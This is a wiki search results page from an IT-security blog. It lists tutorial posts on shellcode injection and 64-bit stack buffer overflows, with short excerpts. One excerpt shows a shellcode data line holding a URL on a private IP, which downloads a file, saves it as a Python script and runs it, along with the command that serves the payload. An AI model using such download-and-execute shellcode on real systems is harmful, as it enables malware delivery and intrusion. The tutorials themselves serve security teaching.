NoSociety.de

#nosoc

  • Page Tools
    Show pageOld revisionsBacklinks
  • Site Tools
    Recent ChangesMedia ManagerSitemap
  • User Tools
    Log In

Search

You can find the results of your search below.

Exact match
  • Exact match
  • Starts with
  • Ends with
  • Contains
@en:it-security
  • Any namespace
  • en:it-security:blog (4)
Any time
  • Any time
  • Past week
  • Past month
  • Past year
Sort by hits
  • Sort by hits
  • Sort by last modified

Fulltext results:

Shellcode Injection Part 3 @en:it-security:blog
6 Hits, Last modified: 16 months ago
can use a shellcode injection to load a file via HTTP and then execute it. \\ \\ ===== Code ===== ===... on WindowsAgent.py", 0 ;Zeile 192 / our URL db "http://172.26.72.38/nat.zip", 0 </code> \\ \\ === Crea... shellcode loads the file ''%%nat.zip%%'' from an HTTP server, saves it as ''%%WindowsAgent.py%%'' and t... ly: <code bash> cp payload.py nat.zip python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http:/
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
3 Hits, Last modified: 14 months ago
''UID'' and ''EUID'' had to be set additionally ((http://disq.us/p/1klc7u2)), on the other hand ''/bin/sh'' no longer works in this way. ((http://disq.us/p/1n4ipc8)) Since there is a ''pop rdi... ' is a NOP function that shifts RSP by 8 bytes. ((http://disq.us/p/247r1cp)) \\ \\ ==== Finding offsets
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
1 Hits, Last modified: 15 months ago
. \\ \\ ==== Place shellcode ==== The Shellcode((http://shell-storm.org/shellcode/files/shellcode-77.ht
Shellcode Injection Part 4 @en:it-security:blog
1 Hits, Last modified: 14 months ago
/)) * x64dbg((https://x64dbg.com/)) * PEView((http://wjradburn.com/software/)) * ShenCode((https:/